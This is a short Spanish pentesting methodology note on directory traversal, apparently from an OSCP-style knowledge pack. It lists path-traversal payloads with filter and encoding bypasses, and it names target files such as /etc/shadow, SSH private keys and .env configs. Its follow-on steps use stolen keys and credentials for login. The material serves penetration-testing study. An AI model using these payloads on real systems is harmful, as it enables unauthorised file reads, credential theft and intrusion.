JARVIS/nucleo/saber/conocimiento/02 - Explotacion web/Directory traversal.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

1.2 KiB

Directory traversal

Salir del directorio web con ../ para leer ficheros arbitrarios. Distinto de LFI a RCE: traversal solo lee; LFI incluye/ejecuta. Vector de Hacking web.

Dónde

Parámetros que apuntan a ficheros: ?file=, ?page=, ?download=, ?doc=, ?path=, ?lang=.

Payloads

../../../../etc/passwd
....//....//....//etc/passwd          (bypass de filtro que quita "../")
%2e%2e%2f%2e%2e%2fetc%2fpasswd        (URL-encode)
%252e%252e%252f                        (doble URL-encode)
/etc/passwd                            (ruta absoluta directa)
..%c0%af..%c0%af                       (UTF-8 overlong)

Windows

..\..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts

Ficheros jugosos

/etc/passwd  /etc/shadow  /etc/hosts
~/.ssh/id_rsa            → login SSH directo
config.php  web.config  .env  → credenciales de BD
/var/www/html/...        → código fuente (busca creds, segundos vectores)

Siguiente paso

  • Lees id_rsa → SSH como ese usuario.
  • Lees código/config → credenciales → Authentication attacks / reutilización.
  • Si además se incluye (PHP) → escala a LFI a RCE.

Relacionado: LFI a RCE · Burp Repeater e Intruder · OSCP MOC